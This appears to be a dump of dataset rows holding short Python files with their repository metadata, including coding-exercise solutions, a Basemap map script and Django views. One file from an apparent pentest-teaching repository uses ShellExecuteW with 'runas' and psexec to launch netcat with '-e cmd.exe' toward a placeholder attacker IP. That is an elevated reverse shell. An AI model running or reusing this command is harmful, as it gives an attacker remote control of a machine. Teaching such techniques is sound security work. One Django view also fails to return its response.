        """Endpoint delegates to WorkflowNextTaskGetter and returns run()."""
        query = "query"
        workflow_next_task_getter = self.mox.CreateMockAnything()
        self.mock.WorkflowNextTaskGetter(query, self.context).AndReturn(workflow_next_task_getter)
        workflow_next_task_getter.run().AndReturn("a")
        self.mox.ReplayAll()
        results = RetailInputEndpoints.get_preset_retail_input_record_validation_next_target(self.mock, query, self.context)
        self.assertEqual('a', results)
| [
"erezrubinstein@hotmail.com"
] | erezrubinstein@hotmail.com |
ab4579ae75158d64126150e2f72325a11f188034 | f0354782628e51b1a301eba1a69e9808b4adc664 | /Problem/10953.py | c854b9afe7a0477b5dc15917bcc5151a1dbed25a | [] | no_license | HyunIm/Baekjoon_Online_Judge | 9b289ea27440c150ef34372dc91e6f92f4102659 | f3a4670ea2b6ee81fa4b1bdcad3412cb995e64f2 | refs/heads/master | 2023-05-26T16:54:39.643360 | 2023-05-23T04:07:08 | 2023-05-23T04:07:08 | 119,958,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | T = int(input())
# One test case per line: two comma-separated integers whose sum is printed.
for _case in range(T):
    left, right = (int(token) for token in input().split(','))
    print(left + right)
| [
"hyunzion@gmail.com"
] | hyunzion@gmail.com |
7ec822625c92375e8d896e391d9e29f135d560bf | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_135/1016.py | ddf1fa1b653fea35088b6d3fe64db5a02aa39fff | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 622 | py | # -*- coding: utf-8 -*-
f = open("A-small-attempt0.in")
T = int(f.readline())
for t in range(T):
a = int(f.readline())
for i in range(1, 5):
s = f.readline()
if i == a:
firstset = set(map(int, s.split(" ")))
b = int(f.readline())
for i in range(1, 5):
s = f.readline()
if i == b:
secondset = set(map(int, s.split(" ")))
dup = firstset & secondset
print "Case #%d:" %(t+1),
if len(dup) == 0:
print "Volunteer cheated!"
elif len(dup) == 1:
print dup.pop()
else:
print "Bad magician!"
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
94acf1ea1faefa3016f2d23ef45c62315e312dda | dbf76237e39087bf1a73243bbb019710182be0e4 | /Capitulo 2/28 - autoridade2.py | 0446ac6eb10b20550fa18cfc8fd429680b9e8601 | [] | no_license | sandromelobrazil/Python_Para_Pentest | 52edd86fa5929e0303e60e9872c027aae564becd | 1837b523ad55e1c8ca066341459714e2fc88f037 | refs/heads/master | 2020-04-05T16:56:22.342925 | 2018-11-11T00:52:23 | 2018-11-11T00:52:23 | 157,035,879 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 191 | py | import ctypes
ctypes.windll.shell32.ShellExecuteW(None, u"runas", u"psexec.exe",
u"-accepteula -nobanner -s -d C:\\Users\\usuario\\Desktop\\nc.exe IP_do_atacante 666 -e cmd.exe", None, 0) | [
"sandromelo.brazil@gmail.com"
] | sandromelo.brazil@gmail.com |
2e24114040a5492d2a20aa1dd70e6205c6b0a72d | 806bf6a28854da12df7fad1deefa175f4e974ad6 | /visualization/c2.2.25.py | 6d7b77a2406ca6f0844169ce7bb3968c0b62250e | [] | no_license | qliu0/PythonInAirSeaScience | ba613e61ce331e5e2b4b5c0045f0223cde42718b | 1c8d5fbf3676dc81e9f143e93ee2564359519b11 | refs/heads/master | 2023-08-28T08:24:15.894918 | 2021-08-26T12:26:58 | 2021-08-26T12:26:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 772 | py | from mpl_toolkits.basemap import Basemap
import numpy as np
import matplotlib.pyplot as plt
# lat_1 / lat_2 are the first and second standard parallels of the
# equidistant conic projection; lat_0 / lon_0 give the map centre.
m = Basemap(width=12000000, height=9000000,
            resolution='l', projection='eqdc',
            lat_1=45., lat_2=55, lat_0=50, lon_0=108.)
m.drawcoastlines()
m.fillcontinents(color='y', lake_color='c')
m.drawparallels(np.arange(-80., 81., 20.))
m.drawmeridians(np.arange(0., 361., 20.))
m.drawmapboundary(fill_color='c')
# Draw Tissot's indicatrices on a 12 x 9 grid of map positions to
# visualise the projection's distortion. (The original bound the unused
# results to `ax` and `poly`; those dead locals are removed.)
for y in np.linspace(m.ymax / 20, 19 * m.ymax / 20, 9):
    for x in np.linspace(m.xmax / 20, 19 * m.xmax / 20, 12):
        # Convert projection coordinates back to lon/lat for tissot().
        lon, lat = m(x, y, inverse=True)
        m.tissot(lon, lat, 2., 100,
                 facecolor='red', zorder=10, alpha=0.5)
plt.title("Equidistant Conic Projection")
plt.show()
| [
"queensbarry@foxmail.com"
] | queensbarry@foxmail.com |
afb3a5e9967dbe9b0e8519795602b3cb86d2e631 | 39fa2df1ab72444f3fe62d29c2dd146fbcdff564 | /test1/MyDjangoSite/myTest/views.py | 1b8c643053f6869de091845b2306c03bae1a14f1 | [] | no_license | gaozhidf/django | faa6c3f623075efc9c30f039ae93c8d02decb085 | 8526c2b33cc41dee9a636d126366990fb502834b | refs/heads/master | 2021-01-01T17:15:52.834568 | 2015-08-13T09:26:26 | 2015-08-13T09:26:26 | 40,441,228 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse, Http404
def hello(request):
    """Return a plain-text greeting for any request."""
    greeting = "Hello world"
    return HttpResponse(greeting)
def hello1(request, num):
try:
num = int(num)
HttpResponse("Hello world too")
except ValueError:
raise Http404() | [
"gaozhidf@gmail.com"
] | gaozhidf@gmail.com |
e0b92735daaf2063e1e568e4174e38dfd2c19568 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Projects/twilio/build/lib/twilio/rest/api/v2010/account/conference/participant.py | b7979a9d6f17baa5d7fd2d1d56c1a25272656037 | [
"LicenseRef-scancode-other-permissive"
] | permissive | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:517e39235cd9a18aa43315a0f2243a0b6f051535285cb71b5db98d5aec53da01
size 30162
| [
"nateweiler84@gmail.com"
] | nateweiler84@gmail.com |
3b15727e1ace910554d9e47e1fc36e68e74aabc0 | c2002f5451a52450db536088cf1f4beec9d23d7f | /0x1C-makefiles/5-island_perimeter.py | 8032bfe4825143c89eebadc851220ba5e6f3a2c5 | [] | no_license | JulianCanoDev/holbertonschool-low_level_programming | d23e10cb14d4cf5bffcb8601bb2e4a7eaf3c3038 | 6484d00870b0578a8acaba0ff125bf2e476828dc | refs/heads/master | 2021-07-12T21:10:35.513238 | 2021-06-22T22:25:17 | 2021-06-22T22:25:17 | 238,518,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 540 | py | #!/usr/bin/python3
"""
Defines an island perimeter measuring
"""
def island_perimeter(grid):
    """Return the perimeter of the island described by ``grid``.

    ``grid`` is a list of rows; each cell is 1 (land) or 0 (water).
    The perimeter is 4 sides per land cell minus 2 for every edge
    shared by two adjacent land cells.
    """
    # Robustness fix: the original crashed on an empty grid ([]) when
    # indexing grid[0]; an empty grid simply has no perimeter.
    if not grid or not grid[0]:
        return 0
    cells = 0         # number of land cells
    shared = 0        # edges shared by two adjacent land cells
    for i, row in enumerate(grid):
        for j, cell in enumerate(row):
            if cell == 1:
                cells += 1
                # Look only left and up so every shared edge is
                # counted exactly once.
                if j > 0 and row[j - 1] == 1:
                    shared += 1
                if i > 0 and grid[i - 1][j] == 1:
                    shared += 1
    return cells * 4 - shared * 2
| [
"juliancano.dev@gmail.com"
] | juliancano.dev@gmail.com |
661c565ec03275a3d21d78d26923358819478938 | b683c8f1942a1ab35062620c6013b1e223c09e92 | /Python-Files/Day-21/Question-87-alternative-solution-2.py | d1f23c21c0e660f4e332852acd43bab6779845c7 | [] | no_license | nihathalici/Break-The-Ice-With-Python | 601e1c0f040e02fe64103c77795deb2a5d8ff00a | ef5b9dd961e8e0802eee171f2d54cdb92f2fdbe8 | refs/heads/main | 2023-07-18T01:13:27.277935 | 2021-08-27T08:19:44 | 2021-08-27T08:19:44 | 377,414,827 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | """
Question 87
Question
With two given lists [1,3,6,78,35,55] and [12,24,35,24,88,120,155],
write a program to make a list whose elements are
intersection of the above given lists.
Hints
Use set() and "&=" to do set intersection operation.
"""
# Input data for the two-list intersection exercise.
list1 = [1, 3, 6, 78, 35, 55]
list2 = [12, 24, 35, 24, 88, 120, 155]

# The & operator on sets keeps exactly the elements common to both lists.
intersection = set(list1) & set(list2)
print(list(intersection))
| [
"noreply@github.com"
] | nihathalici.noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.